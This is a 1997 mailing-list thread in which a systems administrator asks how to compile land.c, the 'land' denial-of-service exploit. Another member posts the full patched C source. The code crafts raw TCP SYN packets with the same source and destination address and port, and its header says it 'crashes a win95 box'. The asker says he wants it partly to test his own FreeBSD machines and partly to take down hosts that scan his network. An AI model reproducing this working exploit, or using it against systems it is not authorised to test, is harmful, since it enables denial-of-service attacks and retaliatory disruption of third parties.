Re: Compiling land.c

1997-11-28 Thread Adam Shand 
> The publichsed land.c doesn't compile cleanly with libc6 under linux.
> It's just a trivial job patching it to work right; here's the fixed
> source code:

Thanks kindly, I figured that's what it was (eventually) but my C skills
are not that good unfortunately.

Thanks for the code.

Adam.

 Internet Alaska --
 4050 Lake Otis Adam  Shand(v) +1 907 562 4638
 Anchorage, Alaska Systems Administrator   (f) +1 907 562 1677
- http://larry.earthlight.co.nz ---



--
TO UNSUBSCRIBE FROM THIS MAILING LIST: e-mail the word "unsubscribe" to
[EMAIL PROTECTED] . 
Trouble?  e-mail to [EMAIL PROTECTED] .

Re: Compiling land.c

1997-11-28 Thread Adam Shand 
> Why you need to compile this program?

Because I have a bunch of FreeBSD boxes that I need to make sure are no
longer vulnerable, and because I want a way of taking down boxes which
insist on aggressivly strobing our network and setting off my pager :)

> If you want to find out whether your linux is vulnerable, just upgrade
> you linux to 2.0.32.

That's Teardrop and the Pentium f00f bug... linux isn't vulnerable to this
attack.

Adam.

 Internet Alaska --
 4050 Lake Otis Adam  Shand(v) +1 907 562 4638
 Anchorage, Alaska Systems Administrator   (f) +1 907 562 1677
- http://larry.earthlight.co.nz ---



--
TO UNSUBSCRIBE FROM THIS MAILING LIST: e-mail the word "unsubscribe" to
[EMAIL PROTECTED] . 
Trouble?  e-mail to [EMAIL PROTECTED] .

Re: Compiling land.c

1997-11-27 Thread Elie Rosenblum 
And thus spake Adam Shand, on Thu, Nov 27, 1997 at 01:07:53AM -0900:
> Hopefully a quick question.  I'm trying to compile land.c (as in the
> exploit) and it bombs out on me because it can't find netinet/ip_tcp.h and
> netinet/protocols.h.
> 
> I've searched my hard drive and I don't have these files anywhere (and I
> have kernel sources installed and most of the -dev packages) and I would
> like to get this compiled. 
> 
> Can someone point me to the right place?

The publichsed land.c doesn't compile cleanly with libc6 under linux.
It's just a trivial job patching it to work right; here's the fixed
source code:


/* land.c by m3lt, FLC
   crashes a win95 box */
/* patched for linux/libc6+debian */

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#define __FAVOR_BSD
#include 

struct pseudohdr
{
struct in_addr saddr;
struct in_addr daddr;
u_char zero;
u_char protocol;
u_short length;
struct tcphdr tcpheader;
};

u_short checksum(u_short * data,u_short length)
{
register long value;
u_short i;

for(i=0;i<(length>>1);i++)
value+=data[i];

if((length&1)==1)
value+=(data[i]<<8);

value=(value&65535)+(value>>16);

return(~value);
}

int main(int argc,char * * argv)
{
struct sockaddr_in sin;
struct hostent * hoste;
int sock;
char buffer[40];
struct iphdr * ipheader=(struct iphdr *) buffer;
struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct 
iphdr));
struct pseudohdr pseudoheader;

fprintf(stderr,"land.c by m3lt, FLC\n");

if(argc<3)
{
fprintf(stderr,"usage: %s IP port\n",argv[0]);
return(-1);
}

bzero(&sin,sizeof(struct sockaddr_in));
sin.sin_family=AF_INET;

if((hoste=gethostbyname(argv[1]))!=NULL)
bcopy(hoste->h_addr,&sin.sin_addr,hoste->h_length);
else if((sin.sin_addr.s_addr=inet_addr(argv[1]))==-1)
{
fprintf(stderr,"unknown host %s\n",argv[1]);
return(-1);
}

if((sin.sin_port=htons(atoi(argv[2])))==0)
{
fprintf(stderr,"unknown port %s\n",argv[2]);
return(-1);
}

if((sock=socket(AF_INET,SOCK_RAW,255))==-1)
{
fprintf(stderr,"couldn't allocate raw socket\n");
return(-1);
}

bzero(&buffer,sizeof(struct iphdr)+sizeof(struct tcphdr));
ipheader->version=4;
ipheader->ihl=sizeof(struct iphdr)/4;
ipheader->tot_len=htons(sizeof(struct iphdr)+sizeof(struct tcphdr));
ipheader->id=htons(0xF1C);
ipheader->ttl=255;
ipheader->protocol=IPPROTO_TCP;
ipheader->saddr=sin.sin_addr.s_addr;
ipheader->daddr=sin.sin_addr.s_addr;

tcpheader->th_sport=sin.sin_port;
tcpheader->th_dport=sin.sin_port;
tcpheader->th_seq=htonl(0xF1C);
tcpheader->th_flags=TH_SYN;
tcpheader->th_off=sizeof(struct tcphdr)/4;
tcpheader->th_win=htons(2048);

bzero(&pseudoheader,12+sizeof(struct tcphdr));
pseudoheader.saddr.s_addr=sin.sin_addr.s_addr;
pseudoheader.daddr.s_addr=sin.sin_addr.s_addr;
pseudoheader.protocol=6;
pseudoheader.length=htons(sizeof(struct tcphdr));
bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct 
tcphdr));
tcpheader->th_sum=checksum((u_short *) &pseudoheader,12+sizeof(struct 
tcphdr));

if(sendto(sock,buffer,sizeof(struct iphdr)+sizeof(struct 
tcphdr),0,(struct sockaddr *) &sin,sizeof(struct sockaddr_in))==-1)
{
fprintf(stderr,"couldn't send packet\n");
return(-1);
}

fprintf(stderr,"%s:%s landed\n",argv[1],argv[2]);

close(sock);
return(0);
}

-- 
Elie Rosenblum <[EMAIL PROTECTED]>   That is not dead which can eternal lie,
 <[EMAIL PROTECTED]>  And with strange aeons even death may die.
Developer / Mercenary / System Administrator - _The Necromicon_


--
TO UNSUBSCRIBE FROM THIS MAILING LIST: e-mail the word "unsubscribe" to
[EMAIL PROTECTED] . 
Trouble?  e-mail to [EMAIL PROTECTED] .

Re: Compiling land.c

1997-11-27 Thread Kevin Traas 
>> >   I'm trying to compile land.c (as in the exploit) ...
>> Why you need to compile this program?
>BTW, linux is NOT vulnerable to this attack.  Even version 1.2.13.

Kudos to Linux!!!

Makes me proud to be a Linux user/supporter

Later,
Kevin



--
TO UNSUBSCRIBE FROM THIS MAILING LIST: e-mail the word "unsubscribe" to
[EMAIL PROTECTED] . 
Trouble?  e-mail to [EMAIL PROTECTED] .

Re: Compiling land.c

1997-11-27 Thread Kevin Traas 
>> >   I'm trying to compile land.c (as in the exploit) ...
>> Why you need to compile this program?
>BTW, linux is NOT vulnerable to this attack.  Even version 1.2.13.

Kudos to Linux!!!

Makes me proud!

Later,
Kevin


--
TO UNSUBSCRIBE FROM THIS MAILING LIST: e-mail the word "unsubscribe" to
[EMAIL PROTECTED] . 
Trouble?  e-mail to [EMAIL PROTECTED] .

Re: Compiling land.c

1997-11-27 Thread Alair Pereira do Lago 
Lawrence <[EMAIL PROTECTED]> writes:

> Adam Shand wrote:
> > 
> > Hey,
> > 
> > Hopefully a quick question.  I'm trying to compile land.c (as in the
> > exploit) and it bombs out on me because it can't find netinet/ip_tcp.h and
> > netinet/protocols.h.
> 
> Why you need to compile this program?
> If you want to find out whether your linux is vulnerable, just upgrade
> you linux to 2.0.32.

BTW, linux is NOT vulnerable to this attack.  Even version 1.2.13.

see 

for a complete list of vulnerable systems.

It includes *BSD, NT, SCO, SunOS but not solaris 

-- 
Alair Pereira do Lago  <[EMAIL PROTECTED]> 
Computer Science Department -- Universidade de S~ao Paulo -- Brazil


--
TO UNSUBSCRIBE FROM THIS MAILING LIST: e-mail the word "unsubscribe" to
[EMAIL PROTECTED] . 
Trouble?  e-mail to [EMAIL PROTECTED] .

Re: Compiling land.c

1997-11-27 Thread Lawrence 
Adam Shand wrote:
> 
> Hey,
> 
> Hopefully a quick question.  I'm trying to compile land.c (as in the
> exploit) and it bombs out on me because it can't find netinet/ip_tcp.h and
> netinet/protocols.h.

Why you need to compile this program?
If you want to find out whether your linux is vulnerable, just upgrade
you linux to 2.0.32.

Lawrence


--
TO UNSUBSCRIBE FROM THIS MAILING LIST: e-mail the word "unsubscribe" to
[EMAIL PROTECTED] . 
Trouble?  e-mail to [EMAIL PROTECTED] .

Compiling land.c

1997-11-27 Thread Adam Shand 

Hey,

Hopefully a quick question.  I'm trying to compile land.c (as in the
exploit) and it bombs out on me because it can't find netinet/ip_tcp.h and
netinet/protocols.h.

I've searched my hard drive and I don't have these files anywhere (and I
have kernel sources installed and most of the -dev packages) and I would
like to get this compiled. 

Can someone point me to the right place?

Thanks,

Adam.


--
TO UNSUBSCRIBE FROM THIS MAILING LIST: e-mail the word "unsubscribe" to
[EMAIL PROTECTED] . 
Trouble?  e-mail to [EMAIL PROTECTED] .